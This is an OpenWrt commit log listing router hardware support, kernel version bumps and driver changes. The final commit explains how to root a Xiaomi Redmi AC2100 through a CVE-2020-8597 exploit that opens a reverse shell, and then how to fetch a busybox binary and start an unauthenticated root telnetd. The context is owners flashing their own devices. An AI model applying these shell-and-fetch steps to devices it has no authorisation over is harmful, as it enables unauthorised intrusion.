| Commit message (Collapse) | Author | Age | Files | Lines |
|
|
|
|
|
|
| |
The new sysfs soft_config driver makes buggy rbcfg obsolete and
entirely replaces it.
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
|
|
|
| |
This commit introduces support for R/W access to the CPU frequency
setting of routerboot on ath79 hardware.
On unsupported hardware, the sysfs attribute will expose the raw tag
value (read-only) to help with reverse engineering its meaning.
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
| |
This routine will be shared between hard and soft config drivers.
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
This driver exposes the data encoded in the "soft_config" flash segment
of MikroTik RouterBOARDs devices. It presents the data in a sysfs folder
named "soft_config" through a set of human-and-machine-parseable
attributes. Changes can be discarded by writing 0 to the 'commit'
attribute, or they can be committed to flash storage by writing 1.
This driver does not reuse any of the existing code previously found in
the "rbcfg" utility and makes this utility obsolete by providing a clean
sysfs interface.
Like "rbcfg", this driver requires 4K_SECTORS support since the flash
partition in which these parameters are stored is typically 4KB in size.
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
| |
This routine will be shared between hard and soft config drivers.
Also use scnprintf() instead of snprintf().
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
For the sake of strictly typed code, add a missing const qualifier.
Add a missing return value in error path.
Check the return value of mtd_read(), for good measure.
Also demote the error printks of failed sysfs file creation to warn
level since they are not fatal in the init() sequence.
Finally, add a note regarding PAGE_SIZE and clarify a comment.
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
| |
The depends and select should apply to the sysfs driver, not the meta
config.
Tested-by: Koen Vandeputte <koen.vandeputte@ncentric.com>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
| |
bcm2708: boot tested on RPi B+ v1.2
bcm2709: boot tested on RPi 3B v1.2
bcm2710: boot tested on RPi 3B v1.2
bcm2711: boot tested on RPi 4B v1.1 4G
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
| |
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
This patch adds support for the COMFAST CF-E130N v2, an outdoor wireless
CPE with a single Ethernet port and a 802.11bgn radio.
Specifications:
- QCA9531 SoC
- 1x 10/100 Mbps Ethernet with PoE-in support
- 64 MB of RAM (DDR2)
- 16 MB of FLASH
- 5 dBi built-in antenna
- POWER/LAN/WLAN green LEDs
- 4x RSSI LEDs (2x red, 2x green)
- UART (115200 8N1) and GPIO (J9) headers on PCB
Flashing instructions:
The original firmware is based on OpenWrt so a sysupgrade image can be
installed via the stock web GUI.
The U-boot bootloader also contains a backup TFTP client to upload the
firmware from. Upon boot, it checks its ethernet network for the IP
192.168.1.10. Host a TFTP server and provide the image to be flashed as
file firmware_auto.bin.
MAC address setup:
The art partition contains four consecutive MAC addresses:
0x0 aa:bb:cc:xx:xx:c4
0x6 aa:bb:cc:xx:xx:c6
0x1002 aa:bb:cc:xx:xx:c5
0x5006 aa:bb:cc:xx:xx:c7
However, the manufacturer in its infinite wisdom decided that one address
is enough and both eth0 and WiFi get the MAC address from 0x0 (yes, that's
overwriting the existing and valid address in 0x1002). This is obviously
also the address on the device's label.
Signed-off-by: Pavel Balan <admin@kryma.net>
[fix configs partition, fix IMAGE_SIZE, add MAC address comment, rename
ATH_SOC to SOC]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
| |
The common separator in this case is a single space.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
| |
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
| |
AHB is 258 MHz for this device (CPU_PLL / 3), but there is no difference
between 64 MHz and 50 MHz for spi-max-frequency, thus increase to 50 MHz.
Tested on revisions C1 and C3.
Signed-off-by: Sebastian Schaper <openwrt@sebastianschaper.net>
|
|
|
|
|
|
|
|
|
|
| |
GPIO 11 needs to be pulled high for the external gigabit switch to work,
this is currently solved via gpio-hog. Replace with phy0 reset-gpios.
Tested on revisions C1 and C3. Reset button is still working for reboot,
to enter failsafe, and to enter bootloader http recovery.
Signed-off-by: Sebastian Schaper <openwrt@sebastianschaper.net>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The device has a total of 8 LEDs, 5 of which are controlled by the switch
(LAN 1-4, WAN). Only power, wifi and wps are controlled by the SoC.
* led_power is on GPIO 5 (not 15), boot flashing sequence is now visible
* remove led 'internet', since it is only connected to the switch
* remove ucidef_set_led_switch for WAN from 01_leds, as it has no effect
Tested on revisions C1 and C3.
Signed-off-by: Sebastian Schaper <openwrt@sebastianschaper.net>
[adjust commit title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
| |
These devices seem to have the same board, so let's have a common
file.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Specifications:
* MediaTek MT7620A (580 Mhz)
* 8 MB of FLASH
* 64 MB of RAM
* 2.4Ghz and 5.0Ghz radios
* 5x 10/100 Mbps Ethernet (1 WAN and 4 LAN)
* UART header on PCB (57600 8n1)
* Green/Orange Power LEDs illuminating a Power-Button Lens
* Green/Orange Internet LEDs GPIO controlled illuminating a Globe/Internet Lens
* 3x button - wps, power and reset
* U-boot bootloader
Installation:
The sysupgrade.bin image is reported to be OEM web flashed with an ncc_att_hwid
appended. ncc_att_hwid is a 32bit binary in the GPL Source download for either
the TEW-810DR or DIR-810L and is located at
source/user/wolf/cameo/ncc/hostTools.
The invocation is: ncc_att_hwid -f tew-810dr-squashfs-factory.bin -a -m "TEW-810DR" -H "1.0R" -r "WW" -c "1.0"
This may need to be altered if your hardware version is "1.1R".
The image can also be directly flashed via serial tftp:
1. Load *.sysupgrade.bin to your tftp server directory and rename for
convenience.
2. Set a static ip 192.168.10.100.
3. NIC cable to a lan port.
4. Serial connection parameters 57600,8N1
5. Power on the TEW-810 and press 4 for a u-boot command line prompt.
6. Verify IP's with U-Boot command "printenv".
7. Adjust tftp settings if needed per the tftp documentation
8. Boot the tftp image to test the build.
9. If the image loads, reset your server ip to 192.168.1.10 and restart network.
10. Log in to Luci, 192.168.1.1, and flash the *sysupgrade.bin image.
Notes:
The only valid MAC address is found in 0x28 of the factory partition.
Other typical offsets/caldata only contain example data: 00:11:22:00:0f:xx
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
[remove "link rx tx" in 01_leds, format and extend commit message,
fix DTS led node names]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
| |
The UBIFS_FS_ZSTD is exposed when UBIFS is enabled.
Signed-off-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
[adjust commit title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Between 4.19 and 5.4, the kernel moved the partition parsers into
the parsers subdirectory. This led to some necessary rebasing of
our local patches for parsers, which partially has been performed
without caring about where the code was inserted.
This commit tries to adjust our local patches so that parsers are
inserted at the "proper" positions with respect to alphabetic sorting
(if possible). Thus, the commit is cosmetic.
While this might look useless now, it will make life easier when
adding other parsers in the future or for rebasing on kernel changes.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
| |
These trailing whitespaces were reported during kernel patch refresh.
While at it, harmonize a few indents as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
|
|
| |
This patch has been backported to stable kernel 5.4 already.
Remove our local patch explicitly now, as by applying the patch
(or refreshing) the relevant code is actually added a second time.
Refresh remaining patches as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
| |
octeon has provided 5.4 as testing kernel for some time now, let's
switch to 5.4 to have a bigger audience for testing.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
| |
Kernel 5.4 is stable for about two months now and there is only a few
patches anyway, so this is mostly upstream stuff. Therefore, it does
not look like we need to keep old 4.14 around any longer.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
| |
Kernel 5.4 is stable for about two months now and there is only one
patch anyway, so this is mostly upstream stuff. Therefore, it does
not look like we need to keep old 4.14 around any longer.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
| |
Remove support for kernel 4.14, and NXP Layerscape SDK
had not supported kernel 4.14 since LSDK-20.04 either.
Signed-off-by: Yangbo Lu <yangbo.lu@nxp.com>
|
|
|
|
|
|
|
| |
Exposing LEDs through LED controller instead of gpio-leds takes
advantage of HW blinking.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
Exposing LEDs through LED controller instead of gpio-leds takes
advantage of HW blinking.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
Exposing LEDs through LED controller instead of gpio-leds takes
advantage of HW blinking.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
Buffalo WSR-2533DHP is identical to the WSR-2533DHPL, Buffalo sold it
with renaming.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Specifications:
- MT7628NN @ 580 MHz
- 32 MB RAM
- 8 MB Flash
- 5x 10/100 Mbps Ethernet (built-in switch)
- 2.4 GHz WLAN
- 2x external, non-detachable antennas (1x for RT-N10P V3)
Flash instructions:
1. Set PC network interface to 192.168.1.75/24.
2. Connect PC to the router via LAN.
3. Turn router off, press and hold reset button, then turn it on.
4. Keep the button pressed till power led starts to blink.
5. Upload the firmware file via TFTP. (Any filename is accepted.)
6. Wait until the router reboots.
Signed-off-by: Ernst Spielmann <endspiel@disroot.org>
[fix node/property name for state_default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
This patch adds support for the WNDR4300SW, marketed by California ISP
SureWest (hence the 'SW' suffix). Hardware wise, it's identical to the
WNDR4300 v1.
Specifications:
* SoC: Atheros AR9344
* RAM: 128 MB
* Flash: 128 MB NAND flash
* WiFi: Atheros AR9580 (5 GHz) and AR9344 (2,4 GHz)
* Ethernet: 5x 1000Base-T
* LED: Power, WAN, LAN, WiFi, USB, WPS
* UART: on board, to the right of the RF shield at the top of the board
Installation:
* Flashing through the OEM web interface:
+ Connect your computer to the router with an ethernet cable and browse
to http://192.168.1.1/
+ Log in with the default credentials are admin:password
+ Browse to Advanced > Administration > Firmware Upgrade in the Netgear
interface
+ Upload the Openwrt firmware: openwrt-ath79-nand-netgear_wndr4300sw-squashfs-factory.img
+ Proceed with the firmware installation and give the device a few
minutes to finish and reboot.
* Flashing through TFTP:
+ Configure your wired client with a static IP in the 192.168.1.x range,
e.g. 192.168.1.10 and netmask 255.255.255.0.
+ Power off the router.
+ Press and hold the RESET button (the factory reset button on the bottom
of the device, with the red circle around it) and turn the router on
while keeping the button pressed.
+ The power LED will start flashing orange. You can release the button
once it switches to flashing green.
+ Transfer the image over TFTP:
$ tftp 192.168.1.1 -m binary -c put openwrt-ath79-nand-netgear_wndr4300sw-squashfs-factory.img
Signed-off-by: Stijn Segers <foss@volatilesystems.org>
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Commit f761f4052c4 had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c41 ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Hardware
--------
SoC: Atheros AR9344
RAM: 128M DDR2
FLASH: 2x Macronix MX25L12845EM
2x 16MiB SPI-NOR
WLAN2: Atheros AR9344 2x2 2T2R
WLAN5: Atheros AR9580 2x2 2T2R
SERIAL: Cisco-RJ45 on the back (115200 8n1)
Installation
------------
The U-Boot CLI is password protected (using the same credentials as the
OS). Default is admin/new2day.
1. Download the OpenWrt initramfs-image. Place it into a TFTP server
root directory and rename it to 1401A8C0.img. Configure the TFTP
server to listen at 192.168.1.66/24.
2. Connect the TFTP server to the access point.
3. Connect to the serial console of the access point. Attach power and
interrupt the boot procedure when prompted (bootdelay is 1 second).
4. Configure the U-Boot environment for booting OpenWrt from Ram and
flash:
$ setenv boot_openwrt 'setenv bootargs; bootm 0xbf230000'
$ setenv ramboot_openwrt 'setenv serverip 192.168.1.66;
tftpboot 0x85000000; bootm'
$ setenv bootcmd 'run boot_openwrt'
$ saveenv
5. Load OpenWrt into memory:
$ run ramboot_openwrt
Wait for the image to boot.
6. Transfer the OpenWrt sysupgrade image to the device. Write the image
to flash using sysupgrade:
$ sysupgrade -n /path/to/openwrt-sysuograde.bin
Signed-off-by: David Bauer <mail@david-bauer.net>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
ADB P.DG A4001N A-000-1A1-AX a.k.a. Telecom Italia ADSL2+ Wi-Fi N (AGPWI)
has the same PCB as the OpenWrt's ADB P.DG A4001N1 with LEDs connected
to different GPIO PINs in active low configuration.
OpenWrt's ADB P.DG A4001N image is made for the ADB P.DG A4001N A-000-1A1-AE.
It has different LEDs configuration and flash size/layout
w.r.t the ADB P.DG A4001N A-000-1A1-AX.
Hardware:
* Board ID: 96328avng
* SoC: Broadcom BCM6328
* RAM DDR2-800: 32 Mbyte - winbond W9725G6KB-25
* Serial flash: 16 Mbyte - MXIC MX25L 12845EMI-10G
* Ethernet: 4x Ethernet 10/100 baseT
* Wifi 2.4GHz: Broadcom Corporation BCM43224/5 Wireless Network Adapter (rev 01)
* LEDs: 2x Power, 2x ADSL, 2x Internet, 2x Wi-Fi, 2x Service
* Buttons: 1x Reset, 1x WPS (named WiFi/LED)
* UART: 1x TTL 115200n8, TX NC RX, on J5 connector (short R192 and R193)
NC GND NC
Installation via CFE:
* Stock CFE has to be overwriten with one for 96328avng boards that can upload
.bin images with no signature check (cfe-A4001N-V0000_96328avng.bin)
* connect a serial port to the board
* Stop the boot process after power on by pressing enter
* set static IP 192.168.1.2 and subnet mask 255.255.255.0
* navigate to http://192.168.1.1/
* upload the OpenWrt image file
Signed-off-by: Daniele Castro <danielecastro@hotmail.it>
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
|
| |
This extracts the model part of the board name and uses it for the
LED string identifiers in 01_leds. As this makes statements more
generic, it will allow to merge more cases in the future.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
|
| |
While "ok" is recognized in DT parsing, only "okay" is actually
mentioned as valid value. Replace it accordingly.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
|
|
|
|
|
|
| |
The squashfs partition is getting too big.
Signed-off-by: Hauke Mehrtens <hauke@hauke-m.de>
|
|
|
|
| |
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
|
| |
Introduce support for generating JFFS2 CFE partition tags.
This is used in NAND devices in order to verify the integrity of the JFFS2
partition.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
There are older devices which require overriding the RGMII ports, so this
shouldn't be limited and forced to BCM63268.
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
NAND is used as extra storage on this device.
Signed-off-by: Daniel Gonzalez Cabanelas <dgcbueu@gmail.com>
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
| |
Page size shift is different from v2.2+ controllers
Signed-off-by: Álvaro Fernández Rojas <noltari@gmail.com>
|
|
|
|
|
|
|
| |
Backport the I2C bus recovery DT configuration for the uDPU that has
been queued for 5.8.
Signed-off-by: Russell King <linux@armlinux.org.uk>
|
|
|
|
|
|
|
| |
Add i2c-pxa updates queued for v5.8, which add bus recovery to this
driver; this is needed for the uDPU platform.
Signed-off-by: Russell King <linux@armlinux.org.uk>
|
|
|
|
|
|
|
| |
Backport the GPIO emulated open drain output fix from v5.5, which is
required for the i2c-pxa backport.
Signed-off-by: Russell King <linux@armlinux.org.uk>
|
|
|
|
|
|
| |
I meant it to be GPL-2.0-only, as evidenced by the boilerplate.
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
| |
I meant it to be GPL-2.0-only, as evidenced by the boilerplate.
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
|
|
|
|
|
|
|
|
|
|
|
| |
Refreshed patches, removed upstreamed patch:
generic/pending: 001-v5.4-pinctrl-qcom-fix-wrong-write-in-update_dual_edge.patch.patch
Run tested: qemu-x86-64
Build tested: x86/64, ath79/nand, imx6, sunxi/a53
Signed-off-by: Petr Štetiar <ynezz@true.cz>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
The last kernel update done with commit 500a02bc29b9 ("x86: Update
configuration") placed most of the updated config only in the x86_64
target.
Move the options needed by the other targets too in the x86 base config,
and add an additional option needed by those targets.
Fixes: 500a02bc29b9 ("x86: Update configuration")
Signed-off-by: Alberto Bursi <bobafetthotmail@gmail.com>
[commit subject/description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
|